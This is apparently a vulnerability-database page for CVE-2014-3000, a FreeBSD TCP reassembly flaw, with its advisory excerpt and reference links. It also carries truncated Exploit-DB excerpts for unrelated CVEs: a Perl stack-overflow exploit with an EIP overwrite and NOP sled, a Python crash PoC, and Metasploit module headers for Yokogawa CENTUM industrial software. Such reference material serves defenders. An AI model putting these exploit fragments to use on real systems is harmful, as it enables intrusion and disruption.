CVE-2014-3000
published 2014-05-02CVE-2014-3000: The TCP reassembly function in the inet module in FreeBSD 8.3 before p16, 8.4 before p9, 9.1 before p12, 9.2 before p5, and 10.0 before p2 allows remote…
PriorityP342high7.8CVSS 2.0
AVNACMAuNCPINAC
EPSS
12.82%
95.8th percentile
The TCP reassembly function in the inet module in FreeBSD 8.3 before p16, 8.4 before p9, 9.1 before p12, 9.2 before p5, and 10.0 before p2 allows remote attackers to cause a denial of service (undefined memory access and system crash) or possibly read system memory via multiple crafted packets, related to moving a reassemble queue entry to the segment list when the queue is full.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
BSD
FreeBSD-SA-14:08.tcp: TCP reassembly vulnerability
bsd_advisories·2014-04-30·CVSS 7.8
CVE-2014-3000 [HIGH] FreeBSD-SA-14:08.tcp: TCP reassembly vulnerability
FreeBSD-SA-14:08.tcp Security Advisory
The FreeBSD Project
Topic: TCP reassembly vulnerability
Category: core
Module: inet
Announced: 2014-04-30
Credits: Jonathan Looney
Affects: All supported versions of FreeBSD.
Corrected: 2014-04-30 04:04:20 UTC (stable/8, 8.4-STABLE)
2014-04-30 04:05:47 UTC (releng/8.4, 8.4-RELEASE-p9)
2014-04-30 04:05:47 UTC (releng/8.3, 8.3-RELEASE-p16)
2014-04-30 04:04:20 UTC (stable/9, 9.2-STABLE)
2014-04-30 04:05:47 UTC (releng/9.2, 9.2-RELEASE-p5)
2014-04-30 04:05:47 UTC (releng/9.1, 9.1-RELEASE-p12)
2014-04-30 04:03:05 UTC (stable/10, 10.0-STABLE)
2014-04-30 04:04:42 UTC (releng/10.0, 10.0-RELEASE-p2)
CVE Name: CVE-2014-3000
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
fo
GHSA
GHSA-rvgw-rhj9-mj2c: The TCP reassembly function in the inet module in FreeBSD 8
ghsa_unreviewed·2022-05-17
CVE-2014-3000 [HIGH] CWE-119 GHSA-rvgw-rhj9-mj2c: The TCP reassembly function in the inet module in FreeBSD 8
The TCP reassembly function in the inet module in FreeBSD 8.3 before p16, 8.4 before p9, 9.1 before p12, 9.2 before p5, and 10.0 before p2 allows remote attackers to cause a denial of service (undefined memory access and system crash) or possibly read system memory via multiple crafted packets, related to moving a reassemble queue entry to the segment list when the queue is full.
No detection rules found.
Exploit-DB
Asx to Mp3 2.7.5 - Local Stack Overflow
exploitdb·2014-10-07
CVE-2009-1324 Asx to Mp3 2.7.5 - Local Stack Overflow
Asx to Mp3 2.7.5 - Local Stack Overflow
---
###########################################################################################
# Exploit Title: ASX to MP3 Converter 2.7.5 stack buffer overflow
# Date: 6 Oct 2014
# Exploit Author: Amir Reza Tavakolian
# Vendor Homepage: http://binarylife.blog.ir/
# Software Link: http://download.cnet.com/ASX-to-MP3-Converter/3000-2168_4-10385919.html
# Version: 2.7.5
# Tested on: windows xp sp 3
#
#
# Special thanks to Mr Michael Czumak (T_v3rn1x) for his tutorial in securitysift.com.
# Thanks Mike. :)
##########################################################################################
#!/usr/bin/perl
my $junk = "\x41" x 35056;
my $eip = pack ('V', 0x73e848a7);
my $nop = "\x90" x 4;
my $shellcode = "\x90" x 25;
$shellcode = $shellcode
Exploit-DB
Light Audio Player 1.0.14 - Memory Corruption (PoC)
exploitdb·2014-03-24
CVE-2014-2671 Light Audio Player 1.0.14 - Memory Corruption (PoC)
Light Audio Player 1.0.14 - Memory Corruption (PoC)
---
#!/usr/bin/python
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: Light Audio Player 1.0.14 Memory Corruption PoC
#[+] Date: 22-03-2014
#[+] Category: DoS/PoC
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor: http://download.cnet.com/Light-Audio-Player/3000-2139_4-10791618.html
#[+] Friendly Sites: na3il.com,th3-creative.com
#[+] Twitter: @TCYB3R
import os
os.system("color 02")
print"###########################################################"
print"# Title: Light Audio Player 1.0.14 Memory Corruption PoC #"
print"# Author: TUNISIAN CYBER #"
print"# Category: DoS/PoC # "
print"###########################################################"
header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
"\x00\x00\x1F\x40\x
Exploit-DB
Yokogawa CENTUM CS 3000 - 'BKBCopyD.exe' Remote Buffer Overflow (Metasploit)
exploitdb·2014-03-12
CVE-2014-0784 Yokogawa CENTUM CS 3000 - 'BKBCopyD.exe' Remote Buffer Overflow (Metasploit)
Yokogawa CENTUM CS 3000 - 'BKBCopyD.exe' Remote Buffer Overflow (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'Yokogawa CENTUM CS 3000 BKBCopyD.exe Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability
exists in the service BKBCopyD.exe when handling specially crafted packets. This module has
been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3.
},
'Author' =>
[
'juan vazquez',
'Redsadic '
],
'References' =>
[
[ 'URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf' ],
[ 'URL', 'https://community.rapid7.com/community/metas
Exploit-DB
Yokogawa CENTUM CS 3000 - 'BKHOdeq.exe' Remote Buffer Overflow (Metasploit)
exploitdb·2014-03-12
CVE-2014-0783 Yokogawa CENTUM CS 3000 - 'BKHOdeq.exe' Remote Buffer Overflow (Metasploit)
Yokogawa CENTUM CS 3000 - 'BKHOdeq.exe' Remote Buffer Overflow (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'Yokogawa CENTUM CS 3000 BKHOdeq.exe Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability
exists in the service BKHOdeq.exe when handling specially crafted packets. This module has
been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3 and Windows
2003 SP2.
},
'Author' =>
[
'juan vazquez',
'Redsadic '
],
'References' =>
[
[ 'URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf' ],
[ 'URL', 'https://community.rapid7.c
No writeups or analysis indexed.
http://secunia.com/advisories/58293http://secunia.com/advisories/59034http://www.debian.org/security/2014/dsa-2952http://www.freebsd.org/security/advisories/FreeBSD-SA-14:08.tcp.aschttp://www.securityfocus.com/bid/67153http://www.securitytracker.com/id/1030172http://secunia.com/advisories/58293http://secunia.com/advisories/59034http://www.debian.org/security/2014/dsa-2952http://www.freebsd.org/security/advisories/FreeBSD-SA-14:08.tcp.aschttp://www.securityfocus.com/bid/67153http://www.securitytracker.com/id/1030172
2014-05-02
Published